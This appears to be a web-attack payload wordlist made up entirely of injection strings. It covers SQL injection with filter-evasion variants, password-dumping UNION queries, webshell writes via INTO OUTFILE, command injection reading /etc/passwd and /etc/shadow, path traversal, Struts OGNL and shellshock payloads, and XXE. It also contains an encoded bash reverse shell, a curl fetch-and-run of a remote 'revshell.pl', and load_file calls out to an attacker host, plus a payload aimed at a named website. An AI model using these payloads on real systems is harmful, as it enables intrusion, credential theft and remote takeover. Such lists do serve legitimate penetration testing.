admin'|cat /etc/passwd||a%20%23|
admin'|cat /etc/passwd||a%20%23|&
&;ls&ls%20-la
123%27%20||%20  echo a||
||%20 echo aaaa
%5B%5D'
[]'
%7C%7C%20bash%20-c%20%22eval%20%5C%60echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx%20%7C%20base64%20--decode%5C%60%22%20%20
|| bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode\`"  
JyBVTklPTiBTRUxFQ1QgMSwyLDMsJzw/IHBocGluZm8oKSA/PicgSU5UTyBPVVRGSUxFICcvdmFyL3d3dy9maWxlLnBocCcgLS0g
&#39&#32&#85&#78&#73&#79&#78&#32&#83&#69&#76&#69&#67&#84&#32&#49&#44&#50&#44&#51&#44&#39&#60&#63&#32&#112&#104&#112&#105&#110&#102&#111&#40&#41&#32&#63&#62&#39&#32&#73&#78&#84&#79&#32&#79&#85&#84&#70&#73&#76&#69&#32&#39&#47&#118&#97&#114&#47&#119&#119&#119&#47&#102&#105&#108&#101&#46&#112&#104&#112&#39&#32&#45&#45&#32
&#x27;&#x20;&#x55;&#x4E;&#x49;&#x4F;&#x4E;&#x20;&#x53;&#x45;&#x4C;&#x45;&#x43;&#x54;&#x20;&#x31;&#x2C;&#x32;&#x2C;&#x33;&#x2C;&#x27;&#x3C;&#x3F;&#x20;&#x70;&#x68;&#x70;&#x69;&#x6E;&#x66;&#x6F;&#x28;&#x29;&#x20;&#x3F;&#x3E;&#x27;&#x20;&#x49;&#x4E;&#x54;&#x4F;&#x20;&#x4F;&#x55;&#x54;&#x46;&#x49;&#x4C;&#x45;&#x20;&#x27;&#x2F;&#x76;&#x61;&#x72;&#x2F;&#x77;&#x77;&#x77;&#x2F;&#x66;&#x69;&#x6C;&#x65;&#x2E;&#x70;&#x68;&#x70;&#x27;&#x20;&#x2D;&#x2D;&#x20;
%27%20%55%4E%49%4F%4E%20%53%45%4C%45%43%54%20%31%2C%32%2C%33%2C%27%3C%3F%20%70%68%70%69%6E%66%6F%28%29%20%3F%3E%27%20%49%4E%54%4F%20%4F%55%54%46%49%4C%45%20%27%2F%76%61%72%2F%77%77%77%2F%66%69%6C%65%2E%70%68%70%27%20%2D%2D%20
'%2520UNION%2520SELECT%25201%252C2%252C3%252C'%253C%253F%2520phpinfo()%2520%253F%253E'%2520INTO%2520OUTFILE%2520'%252Fvar%252Fwww%252Ffile.php'%2520--%2520
%27%20UNION%20SELECT%201%2C2%2C3%2C'%3C%3F%20phpinfo()%20%3F%3E'%20INTO%20OUTFILE%20'%2Fvar%2Fwww%2Ffile.php'%20--%20
' UNION SELECT 1,2,3,'<? phpinfo() ?>' INTO OUTFILE '/var/www/file.php' -- 
%27%2b(select%20*%20from%20(select(sleep(10)))a)%2b%27
||sleep(3)
<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>
 ; x || sleep 3 &
`website.com}','yibelo'=> eval("system('dir');"),` 
|| sleep 3 &
& ping ­n 3 127.0.0.1 &
x || ping ­n 3 127.0.0.1 &
|| ping ­n 3 127.0.0.1 &
| ping ­n 3 127.0.0.1 |
%20;%20x%20%7C%7C%20sleep%203%20%26
%7C%7C%20sleep%203%20%26
%26%20ping%20­n%203%20127.0.0.1%20%26
x%20%7C%7C%20ping%20­n%203%20127.0.0.1%20%26
%7C%7C%20ping%20­n%203%20127.0.0.1%20%26
%7C%20ping%20­n%203%20127.0.0.1%20%7C
%2F%5C..%2F%5C..%2F%5C..%2F%5C..%2F%5C..%2F%5C%2F%5Cetc%2F%5Cpasswd
%2F%5C..%2F%5C..%2F%5C..%2F%5C..%2F%5C..%2F%5C/etc/passwd
%2F%255C..%2F%255C..%2F%255C..%2F%255C..%2F%255C..%2F%255C..%2Fetc%2Fpasswd
/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
%22.phpinfo().%22%20
".phpinfo()." 
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
%2F*'XOR(if(now()*2%3Dsysdate()*2%2Csleep(11)%2C0))OR'
/*'XOR(if(now()*2=sysdate()*2,sleep(11),0))OR'
%252Band%252B1%253Dif(substr((%2540%2540version)%252C1%252C5)%253D0x352e302e37%252C1%252C2)%252523
%2Band%2B1%3Dif(substr((%40%40version)%2C1%2C5)%3D0x352e302e37%2C1%2C2)%2523
+and+1=if(substr((@@version),1,5)=0x352e302e37,1,2)%23
....//....//....//....//....//....//....//etc/passwd
() { :;}; /bin/bash -c \”echo test\”
%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
%00{.exec|cmd.}
' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2
98%27%20AND%208606=BENCHMARK(1000000,MD5(0x4964554a))%20AND%20%27xPUE%27=%27xPUE
=(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))(secconsult)
(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))(secconsult)&z[(search)('secconsult')]=true
'%2b(%23context["xwork.MethodAccessor.denyMethodExecution"]=false,%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
~/web.config
)%20limit%205%3B--
)%20limit%201%3B--
) limit 5;--
) limit 1;--
php://filter/read=convert.base64-encode/resource=etc/passwd
php://filter/read=convert.base64-encode/resource=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
"`echo -e "\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \x0a perl /tmp/tmp_revshell # "`
"`echo -e "\x0a touch /tmp/vulntest "` #"
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
union select group_concat(USER,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user-- -
(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))
(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
||%20echo lol > /var/www/file.php%20||
\x7B\x24\x7B\x70\x68\x70\x69\x6E\x66\x6F\x28\x29\x7D\x7D
%25%37%42%25%32%34%25%37%42%70%68%70%69%6E%66%6F%28%29%25%37%44%25%37%44
%257B%2524%257Bphpinfo()%257D%257D
eyR7cGhwaW5mbygpfX0=
&#123&#36&#123&#112&#104&#112&#105&#110&#102&#111&#40&#41&#125&#125
&#x7B;&#x24;&#x7B;&#x70;&#x68;&#x70;&#x69;&#x6E;&#x66;&#x6F;&#x28;&#x29;&#x7D;&#x7D;
%7B%24%7B%70%68%70%69%6E%66%6F%28%29%7D%7D
%7B%24%7Bphpinfo()%7D%7D
{${phpinfo()}}
6077686F616D6960
\x60\x77\x68\x6F\x61\x6D\x69\x60
YHdob2FtaWA=
&#96&#119&#104&#111&#97&#109&#105&#96
&#x60;&#x77;&#x68;&#x6F;&#x61;&#x6D;&#x69;&#x60;
%2560%2577%2568%256F%2561%256D%2569%2560
%60%77%68%6F%61%6D%69%60
%2560whoami%2560
`whoami`
%60whoami%60
O2lkfA==
&#59&#105&#100&#124
&#x3B;&#x69;&#x64;&#x7C;
3B69647C
\x3B\x69\x64\x7C
%253B%2569%2564%257C
%253Bid%257C
%3B%69%64%7C
%3Bid%7C
;id|
-1 UNIunionON SEselectLECT 1,2,3,4,5-- -
-1 uniOn SeLeCt 1,2,3,4,5—
/*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5— - 
\x7C\x69\x64\x7C
7c69647c
&#124&#105&#100&#124
&#x7C;&#x69;&#x64;&#x7C;
%7C%69%64%7C
%257Cid%257C
%7Cid%7C
|id|
%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
user`cp%20/etc/passwd%20/www/test.txt`
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))
-4731%27+OR+%282708%3D2708%29%23
',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','','','')-- 
%20and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name aschar),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name aschar),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1+and+substring(@@version,1,1)=5
-60+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,version,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables
extractvalue(1,concat(0x2e,(SELECT @@version)));
abc’+a+’def
abc’+(1)+’def
abc’+/**/’def	
abc’+(select 1)+’def	
abc’+(select 1 from dual)+’def
abc	abc
abc’	
abc’||’def	
abc’+'def
%bf%5C&stat=+union+select+1,user(),version(),4,5,6,7--+-
%bf%5C%5C
%bf%5C
(1)and(length(load_file(0x2F6574632F706173737764))=11)%252
(1)and(1)%2523.1
1POST%20%2fHTTP%2f1.1%0d%0aHost:localhost%0d%0aContent-Length:5%0d%0a%0d%0a
select sum(length(table_name)) from information_schema.tables where table_schema = 'information_schema' or table_schema='mysql'
select sum(length(column_name)) from information_schema.columns where table_schema = 'information_schema' or table_schema='mysql'
select sum(length(table_name)) from information_schema.tables where table_schema = 'information_schema' or table_schema='mssql'
select sum(length(column_name)) from information_schema.columns where table_schema = 'information_schema' or table_schema='mssql'
(case(substr((select(group_concat(substr(column_name,1,4)))from(information_schema.columns)),1,1))when(0x61)then(1)else(2)end)
if((select(count(*))from(information_schema.columns))=187,1,2)
(case(substr((select(group_concat(column_name))from(information_schema.columns)group%a0by(table_name)having(table_name)=0x41646D696E6973747261646F726553),1,1))when(0x61)then(1)else(2)end)
(0)union(select(table_name),column_name,(0)from(information_schema.columns)having((table_name)like(0x7573657273)))#
(case(substr((select(group_concat(table_name))from(information_schema.tables)),1,1))when(0x61)then(1)else(2)end)
1%a0union%a0select%a01,2,group_concat(table_name),4,5,6%a0from%a0information_schema.tables;%00
(1)rlike(if(mid(@@version,1,1)like(5),0x28,1))
(select(1)rlike(case(substr(@@version,1,1)=5)when(true)then(0x28)else(1)end))
id,title,content FROM news WHERE content REGEXP '[a-f0-9]{32}'
if(1=1, (select table_name from information_schema.tables), 1)
if(1=1, CAST(1/0 AS char), 1)
if(if((name)like(0x61646D696E),1,0),if(mid((password),1,1)like(0x61),id,0),0);%00
if((name)like(0x61646D696E),1,0);%00
if((name)like(0x61646D696E),id,0);%00
id&&(name)like(0x61646D696E)&&(mid(pass,1,1))like(0x61);%00
(1)and(1)=(0)union(select(null),group_concat(column_name),(null)from(information_schema.columns)where(table_name)=(0x7573657273))#
(1)and(1)=(0)union(select(null),mid(group_concat(table_name),600,100),(null)from(information_schema.tables))#
(1)and(1)=(0)union(select(null),table_name,(null)from(information_schema.tables)limit 28,1-- -)
id&&name=0x61646D696E&&mid(pass,1,1)=0x61;%00
1||1=1&&name=0x61646D696E&&mid(pass,1,1)=0x61;%00
(SELECT id FROM users WHERE name = 'admin') && mid(pass,1,1)=('a');%00
1 and 1=0 union select null,password,null from users limit 1,1-- -
1 and 1=0 union select null,column_name,null from information_schema.columns where table_name='foundtablename' LIMIT 0,1-- -
1 and 1=0 union select null,table_name,null from information_schema.tables limit 28,1-- -
1 or abc=abc LIMIT x,1-- -
(1)rlike(if(mid(@@version,1,1)like(5),0x28,1))
(select(1)rlike(case(substr(@@version,1,1)=5)when(true)then(0x28)else(1)end))
(0)union(select(table_name),column_name,(0)from(information_schema.columns)having((table_name)like(0x7573657273)))#
(0)union(select(table_name),column_name,(0)from(information_schema.columns)having((table_name)like(0x7573657273)&&(column_name)!=(0x6964)))#
(0)union(select(table_name),column_name,(0)from(information_schema.columns)having((table_name)like(0x7573657273)and(NOT((column_name)like(0x6964)))))#
(coalesce(length(load_file(0x2F6574632F706173737764)),1))
(case(mid(load_file(0x2F6574632F706173737764),$x,1))when($char)then(1)else(0)end)
 ’1′%’0
(case when(mid(pass,1,1)='a') then 1 else 0 end)
1&&mid(pass,1,1)=(0x61);%00
2&&mid(pass,1,1)=(0x61);%00
3&&mid(pass,1,1)=(0x61);%00
(0)union(select(table_schema),table_name,(0)from(information_schema.tables)having((table_schema)like(0x74657374)))#
(0)union(select(0),database(),(0))#
(0)union(select(0),group_concat(schema_name),(0)from(information_schema.schemata))#
(0)union(select(0),group_concat(column_name),(0)from(information_schema.columns))#
(0)union(select(0),group_concat(table_name),(0)from(information_schema.tables))#
2-1#
1#
if(1=1, (select table_name from information_schema.tables), 1)
if(1=1, CAST(1/0 AS char), 1)
select sum(length(table_name)) from information_schema.tables where table_schema = 'information_schema' or table_schema='mssql'
select sum(length(column_name)) from information_schema.columns where table_schema = 'information_schema' or table_schema='mssql'
(case(substr((select(group_concat(substr(column_name,1,4)))from(information_schema.columns)),1,1))when(0x61)then(1)else(2)end)
if((select(count(*))from(information_schema.columns))=187,1,2)
(case(substr((select(group_concat(column_name))from(information_schema.columns)group%a0by(table_name)having(table_name)=0x41646D696E6973747261646F726553),1,1))when(0x61)then(1)else(2)end)
(0)union(select(table_name),column_name,(0)from(information_schema.columns)having((table_name)like(0x7573657273)))#
(case(substr((select(group_concat(table_name))from(information_schema.tables)),1,1))when(0x61)then(1)else(2)end)
1%a0union%a0select%a01,2,group_concat(table_name),4,5,6%a0from%a0information_schema.tables;%00
‘ or 1=1#
‘ or 1=1– -
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;%00
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+ – ~ !
‘ or –+2=- -!!!’2
^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
%20 %09 %0a %0b %0c %0d %a0 /**/
‘or+(1)sounds/**/like“1“–%a0-
‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
SELECT ‘a’
SELECT “a”
SELECT n’a’
SELECT b’1100001′
SELECT _binary’1100001′
SELECT x’61′
‘abc’ = 0×616263
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users
‘ or true = ’1 # or 1=1
‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
‘ or ’1 # or true
select * from users where ‘a’='b’='c’
select * from users where (‘a’='b’)=’c’
select * from users where (false)=’c’
select * from users where (0)=’c’
select * from users where (0)=0
select * from users where true
select * from users
select * from users where name = ”=”
select * from users where false = ”
select * from users where 0 = 0
select * from users where true
select * from users
select * from users where name = ”-”
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
ascii (97)
load_file/*foo*/(0×616263)
‘abc’ = unhex(616263)
‘abc’ = char(97,98,99)
hex(‘a’) = 61
ascii(‘a’) = 97
ord(‘a’) = 97
‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format	 // %H:%i:%s
@@binlog_format	 // MIXED
@@version_comment	 // MySQL Community Server (GPL)
dayname(from_days(401))	 // Monday
dayname(from_days(403))	 // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1))	 // January
collation(convert((1)using/**/koi8r))	 // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs
aes_encrypt(1,12)	 // 4çh±{?”^c×HéÉEa
des_encrypt(1,2)	 // ‚GÒ/ïÖk
@@ft_boolean_syntax	 // + -><()~*:""&|
@@date_format	 // %Y-%m-%d
@@innodb_log_group_home_dir	 // .\
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36
@@new: 0
@@log_bin: 1
!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4
minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)
substr(‘abc’,1,1) = ‘a’
substr(‘abc’ from 1 for 1) = ‘a’
substring(‘abc’,1,1) = ‘a’
substring(‘abc’ from 1 for 1) = ‘a’
mid(‘abc’,1,1) = ‘a’
mid(‘abc’ from 1 for 1) = ‘a’
lpad(‘abc’,1,space(1)) = ‘a’
rpad(‘abc’,1,space(1)) = ‘a’
left(‘abc’,1) = ‘a’
reverse(right(reverse(‘abc’),1)) = ‘a’
insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
space(0) = trim(version()from(version()))
locate(‘a’,'abc’)
position(‘a’,'abc’)
position(‘a’ IN ‘abc’)
instr(‘abc’,'a’)
substring_index(‘ab’,'b’,1)
length(trim(leading ‘a’ FROM ‘abc’))
length(replace(‘abc’, ‘a’, ”))
strcmp(‘a’,'a’)
mod(‘a’,'a’)
find_in_set(‘a’,'a’)
field(‘a’,'a’)
count(concat(‘a’,'a’))
length()
bit_length()
char_length()
octet_length()
bit_count()
ucase
lcase
lower
upper
password(‘a’) != password(‘A’)
old_password(‘a’) != old_password(‘A’)
md5(‘a’) != md5(‘A’)
sha(‘a’) != sha(‘A’)
aes_encrypt(‘a’) != aes_encrypt(‘A’)
des_encrypt(‘a’) != des_encrypt(‘A’)
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
OR, AND
‘||1=’1
‘&&1=’1
‘=’
‘-’
OR, AND, UNION
‘ and (select pass from users limit 1)=’secret
OR, AND, UNION, LIMIT
‘ and (select pass from users where id =1)=’a
OR, AND, UNION, LIMIT, WHERE
‘ and (select pass from users group by id having id = 1)=’a
OR, AND, UNION, LIMIT, WHERE, GROUP
‘ and length((select pass from users having substr(pass,1,1)=’a'))
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
‘ and (select substr(group_concat(pass),1,1) from users)=’a
‘ and substr((select max(pass) from users),1,1)=’a
‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a
‘=” into outfile ‘/var/www/dump.txt
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
‘ procedure analyse()#
‘-if(name=’Admin’,1,0)#
‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a',1,0),0)#
Control flow
case ‘a’ when ‘a’ then 1 [else 0] end
case when ‘a’='a’ then 1 [else 0] end
if(‘a’='a’,1,0)
ifnull(nullif(‘a’,'a’),1)
1+(UnIoN)+(SelECT)+
1+(UnIoN+SeLeCT)+
1+(UnI)(oN)+(SeL)(EcT)
1+'UnI''On'+'SeL''ECT'
1+%55nion all /*!12345%53elect*/ 1,version(),3—
1+UnIoN+SeLecT 1,2,3—
1+UnIOn/**/SeLect 1,2,3—
1+UNIunionON+SELselectECT 1,2,3—
1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
1+un/**/ion+sel/**/ect+1,2,3--
1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
1+/**/union/*&id=*/select/*&id=*/1,2,3--
IF(SUBSTR(%40%40version%2c1%2c1)<5%2cBENCHMARK(2000000%2cSHA1(0xDEADBEEF))%2cSLEEP(3))/*'XOR(IF(SUBSTR(%40%40version%2c1%2c1)<5%2cBENCHMARK(2000000%2cSHA1(0xDEADBEEF))%2cSLEEP(3)))OR'%7c%22XOR(IF(SUBSTR(%40%40version%2c1%2c1)<5%2cBENCHMARK(2000000%2cSHA1(0xDEADBEEF))%2cSLEEP(3)))OR%22*/
'%2b(select%201%20from%20(select%20sleep(20))A)%2b'
1+union+select+1,group_concat(name,0x3a,password),3,4+from+users--
+union+select+1,group_concat(name,0x3a,password),3,4,5,6,7,8+from+users--
&apos; or 'a'='b
&apos; or 'a'='a
1+union+select+1,2,3,4,5,6,7,8,9,10,version(),11,12,13,14--
1+union+select+1,2,version(),4,5,6,7--
http://www.petXersbach.fr//public/index.php?act=photo_afficher&code=pub_phototheque2&num=1+union+select+1,2,vers
ion(),4,5,6,7--
-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11--
-1+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12--
-1+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11--
-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11--
QktNJTIwIj48aWZyYW1lIHNyYz1cXHNvdXJjZT4g
%42%4B%4D%25%32%30%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%5C%73%6F%75%72%63%65%3E%20
%3D%22(-pubdate*(substring(version()%2C1%2C1)%3D5))%22%3E
="(-pubdate*(substring(version(),1,1)=5))">
%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20
%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20
OR substring(version(),1,1)=5 -- 
0%27%20UNION%20SELECT%201,2,3,4,version%28%29,6,7,8%20--%202
content=http://evolution-sec.com
-1.0
0xffffffff 
0x7fffffff 
0x80000000
0x3fffffff
NULL
http://www.wp.pl
'");|]*{%0d%0a<%00
!(%28%29&%26%21%7C*|%2A%7C
)
/
'"
%3Bprintf(md5(bart_wvs_security_test))%3Bexit%3B//
'%3Bprintf(md5(bart_security_test))%3Bexit%3B//
%3Bprintf(md5(bart_security_test))%3Bexit%3B//
printf(md5(bart_security_test))%3Bexit%3B//
<dir
%00dir%00
dir
%26dir
%3Bdir
%7Cdir
%26dir%26
<cat%20/etc/passwd%00 
%00cat%20/etc/passwd%00
%7Ccat+/etc/passwd
%3Bcat+/etc/passwd%3B
cat+/etc/passwd
%60cat+/etc/passwd%60
+%0acat+/etc/passwd%0a
+%26cat+/etc/passwd%26
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afboot.ini
|..\..\..\..\..\..\..\..\boot.ini
<..\..\..\..\..\..\..\..\boot.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini
../..//../..//../..//../..//../..//../..//../..//../..//boot.ini
..\..\..\..\..\..\..\..\boot.ini
/./././././././boot.ini 
C:\boot.ini
/.\./.\./.\./.\./.\./.\./boot.ini
../../../../../../../../boot.ini%00.jpg
../../../../../../../../boot.ini%00.html
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
../../../../../../../../boot.ini%00
../../../../../../../../boot.ini
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
|../../../../../../../../etc/passwd
<../../../../../../../../etc/passwd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd
/./././././././etc/passwd
/etc/passwd 
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
../../../../../../../../etc/passwd%00.jpg
../../../../../../../../etc/passwd%00.html
%00../../../../../../../../etc/passwd
../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd
http://testphp.vulnweb.com/bart_test?
http://some-inexistent-website.com/some_inexistent_file_with_long_name
%0d%0aSomeCustomInjectedHeader%3Ainjected_by_bart
%0aSomeCustomInjectedHeader%3Ainjected_by_bart
'+%7C%7C+'aaaa
'+%7C%7C+'
'%2B'BART 
'%2Blower('')%2Bupper('')%2B'
%2B31337%2B31337
%2B31337
%2B31337%2D31337
"+or+1%3D1+--+
"+or+1%3D0+--+
"+and+1%3D1+--+
"+and+1%3D0+--+ 
'+or+1%3D1+--+
'+and+1%3D1+--+
'+and+1%3D0+--+
2989+or+1%3D1+--+
2989+or+1%3D0+--+
2989+and+1%3D0+--+
yes"+and+"1"%3D"0
"+and+"1"%3D"1
'+and+'1'%3D'0
'+and+'1'%3D'1
+or+1%3D0
+or+1%3D1
+and+1%3D0
+and+1%3D1
0.001 
JyI%3D 
\"
\'
bart'"
%00'
(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg
;echo '%23!/bin/bash' > /tmp/fileheader 
;echo '$1' > /tmp/filecode 
;%20cat%20/etc/shadow
> /dev/null 2>&1
BKM%20"><iframe src=\\source>
%27%272
1e101
-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+
-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ 
....//....//....//....//etc/passwd
\047\%27
\\047
\140
%60
%b4
999999.9' union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536 and 'x'='x
1' AND 3254=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(80)||CHR(119)||CHR(102),5) AND 'OHSK'='OHSK
